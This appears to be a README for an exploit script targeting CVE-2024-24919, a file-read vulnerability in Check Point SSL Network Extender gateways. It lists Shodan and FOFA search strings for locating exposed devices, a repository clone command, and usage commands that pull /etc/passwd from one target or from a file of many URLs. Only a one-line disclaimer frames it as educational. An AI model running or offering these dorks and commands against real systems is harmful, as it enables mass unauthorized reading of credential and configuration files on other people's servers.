CVE Identifier: CVE-2024-24919 Vulnerability Type: Local File Inclusion (LFI) Severity: High CVSS Score: 7.5 (High)
CVE-2024-24919 is a Local File Inclusion (LFI) vulnerability present in certain web applications. This vulnerability allows an attacker to read files from the server by manipulating the file path input parameter. By exploiting this flaw, an attacker can gain access to sensitive files on the server, such as configuration files, password files, and other critical data, leading to information disclosure and potential further compromise.
Check Point SSL Network Extender
- Shodan "Server: Check Point SVN"
- fofa title=="Check Point SSL Network Extender"
intall exploit
git clone https://github.com/gurudattch/CVE-2024-24919
install requirements
pip install -r requirments.txt
Check a Single URL To check a single URL for the vulnerability:
python cve-2024-24919.py -u "http://example.com" -d "/etc/passwd"
Check Multiple URLs from a File
python cve-2024-24919.py -f "urls.txt" -d "/etc/passwd"
Arguments
options:
-h, --help show this help message and exit
-u URL, --url URL Single URL to check for vulnerability
-f FILE, --file FILE File containing multiple URLs to check
-d DATA, --data DATA Data to send in the request (eg. /etc/passwd)
-r {y,n}, --response {y,n} Print Response Or Not
This script is intended for educational purposes and should only be used to test systems you own or have permission to test. Unauthorized use of this script against systems without permission is illegal.